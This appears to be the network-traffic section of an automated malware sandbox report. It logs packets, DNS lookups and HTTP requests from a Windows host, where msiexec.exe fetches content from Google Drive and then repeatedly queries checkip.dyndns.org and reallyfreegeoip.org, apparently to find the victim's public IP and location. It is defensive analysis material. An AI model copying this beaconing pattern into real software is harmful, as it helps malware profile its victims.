Jan 10, 2025 16:02:43.756285906 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.756292105 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.756354094 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.760694981 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.760751009 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.760762930 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.760838032 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.765340090 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.765531063 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.765537024 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.765650034 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.770008087 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.770062923 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.770075083 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.770116091 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.774615049 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.774713993 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.774719000 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.774872065 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.780793905 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.780862093 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.780867100 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.780985117 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.783920050 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.784486055 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.784492970 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.784548044 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.788237095 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.788311005 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.788399935 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.788558006 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.792373896 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.792418957 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.792429924 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.792470932 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.792475939 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.792552948 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.796801090 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.797013044 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.797019005 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.797100067 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.800550938 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.800610065 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.800614119 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.800699949 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.804294109 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.804342031 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.804389000 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.804445982 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.807949066 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.808142900 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.808150053 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.808342934 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.811628103 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.811690092 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.811738014 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.811849117 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.815309048 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.815361023 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.815366983 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.815464020 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.818737030 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.818839073 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.820565939 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.820828915 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.822227955 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.822269917 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.822280884 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.822393894 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.824595928 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.824639082 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.824651957 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.824795008 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.826822996 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.826932907 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.826947927 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.827104092 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.828851938 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.828989029 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.828994989 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.829046011 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.831181049 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.831275940 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.831283092 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.831326962 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.833306074 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.833415031 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.833420992 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.833465099 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.835366011 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.835436106 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.835458994 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.835639000 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.837399006 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.837476969 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.837495089 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.837546110 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.837716103 CET	443	49871	142.250.181.225	192.168.2.9
Jan 10, 2025 16:02:43.837770939 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:43.837837934 CET	49871	443	192.168.2.9	142.250.181.225
Jan 10, 2025 16:02:44.059257984 CET	49897	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:44.064033985 CET	80	49897	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:44.064129114 CET	49897	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:44.064332008 CET	49897	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:44.069190979 CET	80	49897	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:44.713593960 CET	80	49897	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:44.716928005 CET	49897	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:44.721767902 CET	80	49897	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:44.911041975 CET	80	49897	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:44.961622000 CET	49897	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:45.691181898 CET	49909	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:45.691221952 CET	443	49909	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:45.691293955 CET	49909	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:45.694020033 CET	49909	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:45.694039106 CET	443	49909	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:46.156857014 CET	443	49909	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:46.156919003 CET	49909	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:46.160164118 CET	49909	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:46.160171986 CET	443	49909	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:46.160515070 CET	443	49909	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:46.163613081 CET	49909	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:46.207324982 CET	443	49909	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:46.309674978 CET	443	49909	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:46.309731007 CET	443	49909	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:46.309799910 CET	49909	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:46.319016933 CET	49909	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:46.331145048 CET	49897	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:46.335961103 CET	80	49897	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:46.539545059 CET	80	49897	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:46.541692972 CET	49915	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:46.541757107 CET	443	49915	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:46.541851997 CET	49915	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:46.542160034 CET	49915	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:46.542171001 CET	443	49915	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:46.586582899 CET	49897	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:47.016850948 CET	443	49915	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:47.022161007 CET	49915	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:47.022181034 CET	443	49915	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:47.164758921 CET	443	49915	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:47.164825916 CET	443	49915	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:47.168539047 CET	49915	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:47.168780088 CET	49915	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:47.171710968 CET	49897	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:47.172641039 CET	49921	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:47.176686049 CET	80	49897	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:47.177423000 CET	80	49921	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:47.177499056 CET	49897	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:47.177516937 CET	49921	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:47.177603006 CET	49921	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:47.182343006 CET	80	49921	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:47.813488007 CET	80	49921	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:47.815135956 CET	49924	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:47.815180063 CET	443	49924	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:47.815246105 CET	49924	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:47.815490007 CET	49924	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:47.815500975 CET	443	49924	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:47.867820978 CET	49921	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:48.273025036 CET	443	49924	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:48.274626017 CET	49924	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:48.274658918 CET	443	49924	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:48.406317949 CET	443	49924	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:48.406388044 CET	443	49924	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:48.406433105 CET	49924	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:48.406763077 CET	49924	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:48.411449909 CET	49927	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:48.416240931 CET	80	49927	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:48.416296959 CET	49927	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:48.416366100 CET	49927	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:48.421072960 CET	80	49927	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:49.053034067 CET	80	49927	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:49.069580078 CET	49933	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:49.069619894 CET	443	49933	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:49.069703102 CET	49933	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:49.069994926 CET	49933	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:49.070018053 CET	443	49933	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:49.102165937 CET	49927	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:49.543239117 CET	443	49933	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:49.544891119 CET	49933	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:49.544919968 CET	443	49933	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:49.686618090 CET	443	49933	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:49.686692953 CET	443	49933	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:49.688232899 CET	49933	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:49.689953089 CET	49933	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:49.691812992 CET	49927	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:49.693016052 CET	49939	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:49.698108912 CET	80	49927	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:49.698179960 CET	49927	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:49.698425055 CET	80	49939	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:49.700997114 CET	49939	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:49.700997114 CET	49939	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:49.708266973 CET	80	49939	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:50.338061094 CET	80	49939	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:50.341738939 CET	49945	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:50.341785908 CET	443	49945	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:50.341845036 CET	49945	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:50.342071056 CET	49945	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:50.342081070 CET	443	49945	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:50.383682013 CET	49939	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:50.951164007 CET	443	49945	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:50.952862978 CET	49945	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:50.952903986 CET	443	49945	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:51.116197109 CET	443	49945	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:51.116271973 CET	443	49945	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:51.116342068 CET	49945	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:51.116733074 CET	49945	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:51.126861095 CET	49939	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:51.127532959 CET	49947	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:51.132397890 CET	80	49939	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:51.132441044 CET	80	49947	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:51.132473946 CET	49939	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:51.132520914 CET	49947	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:51.132606983 CET	49947	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:51.137551069 CET	80	49947	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:51.790949106 CET	80	49947	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:51.792366982 CET	49953	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:51.792399883 CET	443	49953	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:51.792540073 CET	49953	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:51.792855978 CET	49953	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:51.792865038 CET	443	49953	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:51.836544991 CET	49947	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:52.256537914 CET	443	49953	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:52.258295059 CET	49953	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:52.258326054 CET	443	49953	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:52.392947912 CET	443	49953	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:52.393018007 CET	443	49953	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:52.393079996 CET	49953	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:52.393481970 CET	49953	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:52.397104979 CET	49947	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:52.398332119 CET	49958	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:52.402112961 CET	80	49947	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:52.402215958 CET	49947	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:52.403156996 CET	80	49958	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:52.403238058 CET	49958	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:52.403361082 CET	49958	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:52.408103943 CET	80	49958	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:53.047909021 CET	80	49958	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:53.049195051 CET	49964	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:53.049228907 CET	443	49964	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:53.049294949 CET	49964	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:53.049556017 CET	49964	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:53.049566984 CET	443	49964	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:53.102123022 CET	49958	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:53.505831003 CET	443	49964	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:53.507652998 CET	49964	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:53.507711887 CET	443	49964	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:53.657702923 CET	443	49964	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:53.657763004 CET	443	49964	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:53.657812119 CET	49964	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:53.658175945 CET	49964	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:53.661393881 CET	49958	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:53.662672997 CET	49970	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:53.666373014 CET	80	49958	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:53.666421890 CET	49958	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:53.667515993 CET	80	49970	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:53.667578936 CET	49970	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:53.667634010 CET	49970	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:53.672357082 CET	80	49970	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:54.297077894 CET	80	49970	193.122.6.168	192.168.2.9
Jan 10, 2025 16:02:54.298239946 CET	49974	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:54.298302889 CET	443	49974	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:54.298391104 CET	49974	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:54.298625946 CET	49974	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:54.298641920 CET	443	49974	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:54.352190018 CET	49970	80	192.168.2.9	193.122.6.168
Jan 10, 2025 16:02:54.752001047 CET	443	49974	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:54.753742933 CET	49974	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:54.753761053 CET	443	49974	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:54.887115955 CET	443	49974	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:54.887223005 CET	443	49974	104.21.112.1	192.168.2.9
Jan 10, 2025 16:02:54.887392998 CET	49974	443	192.168.2.9	104.21.112.1
Jan 10, 2025 16:02:54.887778044 CET	49974	443	192.168.2.9	104.21.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 16:02:39.047142029 CET	49361	53	192.168.2.9	1.1.1.1
Jan 10, 2025 16:02:39.053690910 CET	53	49361	1.1.1.1	192.168.2.9
Jan 10, 2025 16:02:40.183206081 CET	54412	53	192.168.2.9	1.1.1.1
Jan 10, 2025 16:02:40.190017939 CET	53	54412	1.1.1.1	192.168.2.9
Jan 10, 2025 16:02:44.048367023 CET	59264	53	192.168.2.9	1.1.1.1
Jan 10, 2025 16:02:44.055475950 CET	53	59264	1.1.1.1	192.168.2.9
Jan 10, 2025 16:02:45.683180094 CET	60882	53	192.168.2.9	1.1.1.1
Jan 10, 2025 16:02:45.690382004 CET	53	60882	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 16:02:39.047142029 CET	192.168.2.9	1.1.1.1	0x9c32	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:40.183206081 CET	192.168.2.9	1.1.1.1	0xd79f	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:44.048367023 CET	192.168.2.9	1.1.1.1	0x728b	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:45.683180094 CET	192.168.2.9	1.1.1.1	0xa9b6	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 16:02:39.053690910 CET	1.1.1.1	192.168.2.9	0x9c32	No error (0)	drive.google.com		172.217.16.206	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:40.190017939 CET	1.1.1.1	192.168.2.9	0xd79f	No error (0)	drive.usercontent.google.com		142.250.181.225	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:44.055475950 CET	1.1.1.1	192.168.2.9	0x728b	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 16:02:44.055475950 CET	1.1.1.1	192.168.2.9	0x728b	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:44.055475950 CET	1.1.1.1	192.168.2.9	0x728b	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:44.055475950 CET	1.1.1.1	192.168.2.9	0x728b	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:44.055475950 CET	1.1.1.1	192.168.2.9	0x728b	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:44.055475950 CET	1.1.1.1	192.168.2.9	0x728b	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:45.690382004 CET	1.1.1.1	192.168.2.9	0xa9b6	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:45.690382004 CET	1.1.1.1	192.168.2.9	0xa9b6	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:45.690382004 CET	1.1.1.1	192.168.2.9	0xa9b6	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:45.690382004 CET	1.1.1.1	192.168.2.9	0xa9b6	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:45.690382004 CET	1.1.1.1	192.168.2.9	0xa9b6	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:45.690382004 CET	1.1.1.1	192.168.2.9	0xa9b6	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 16:02:45.690382004 CET	1.1.1.1	192.168.2.9	0xa9b6	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49897	193.122.6.168	80	5400	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:02:44.064332008 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 16:02:44.713593960 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:02:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 16:02:44.716928005 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
